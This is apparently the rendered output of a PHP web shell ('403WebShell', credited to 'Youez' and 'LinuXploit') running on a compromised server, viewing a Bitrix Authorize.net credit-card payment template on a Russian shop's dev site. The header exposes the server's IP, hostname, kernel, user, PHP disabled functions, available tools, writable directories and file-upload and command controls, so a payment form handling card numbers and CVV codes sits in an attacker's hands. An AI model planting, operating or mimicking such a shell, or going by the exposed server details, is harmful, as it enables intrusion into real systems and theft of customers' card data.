%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 18.117.76.135
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/handlers/paysystem/authorize/template/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/modules/sale/handlers/paysystem/authorize/template/template.php
<?php
if (!defined("B_PROLOG_INCLUDED") || B_PROLOG_INCLUDED !== true)
	die();

use Bitrix\Main\Localization\Loc;

Loc::loadMessages(__FILE__);
$messages = Loc::loadLanguageFile(__FILE__);
?>
<div class="mb-4" id="paysystem-authorize">
	<form id="paysystem-authorize-form">
		<div class="form-group row">
			<label for="ccardNumber" class="col-sm-6 col-form-label text-sm-right"><?=Loc::getMessage("AN_CC")?></label>
			<div class="col-sm-6">
				<input type="text" id="ccardNumber" name="ccard_num" size="30" value="" class="form-control">
			</div>
		</div>

		<div class="form-group row">
			<label for="ccardDate1" class="col-sm-6 col-form-label text-sm-right"><?=Loc::getMessage("AN_CC_DATE")?></label>
			<div class="col-auto">
				<input type="text" name="ccard_date1" size="5" value="" class="form-control" id="ccardDate1">
			</div>
			<div class="col-auto col-form-label">/</div>
			<div class="col-auto">
				<input type="text" name="ccard_date2" size="5" value="" class="form-control">
			</div>
		</div>

		<div class="form-group row">
			<label for="ccardCode" class="col-sm-6 col-form-label text-sm-right"><?=Loc::getMessage("AN_CC_CVV2")?></label>
			<div class="col-auto">
				<input type="text" id="ccardCode" name="ccard_code" size="5" value="" class="form-control">
			</div>
		</div>

		<div class="form-group row">
			<div class="col-sm-6"></div>
			<div class="col-auto">
				<input type="hidden" name="payment_id" value="<?=htmlspecialcharsbx($params['PAYMENT_ID']);?>">
				<input type="submit" value="<?=Loc::getMessage("AN_CC_BUTTON")?>" class="inputbutton btn btn-lg btn-success pl-4 pr-4" style="border-radius: 32px;">
			</div>
		</div>
	</form>
</div>

<script>
	<?php
	include_once 'script.js';
	?>
	BX.message(<?= CUtil::PhpToJSObject($messages) ?>);
	BX.ready(function(){
		BX.Sale.Authorize.init({
			formId: 'paysystem-authorize-form',
			paysystemBlockId: 'paysystem-authorize',
			ajaxUrl: '/bitrix/tools/sale_ps_ajax.php',
			paymentId: '<?= CUtil::JSEscape($params['PAYMENT_ID']) ?>',
			paySystemId: '<?= CUtil::JSEscape($params['PAYSYSTEM_ID']) ?>',
		});
	});
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit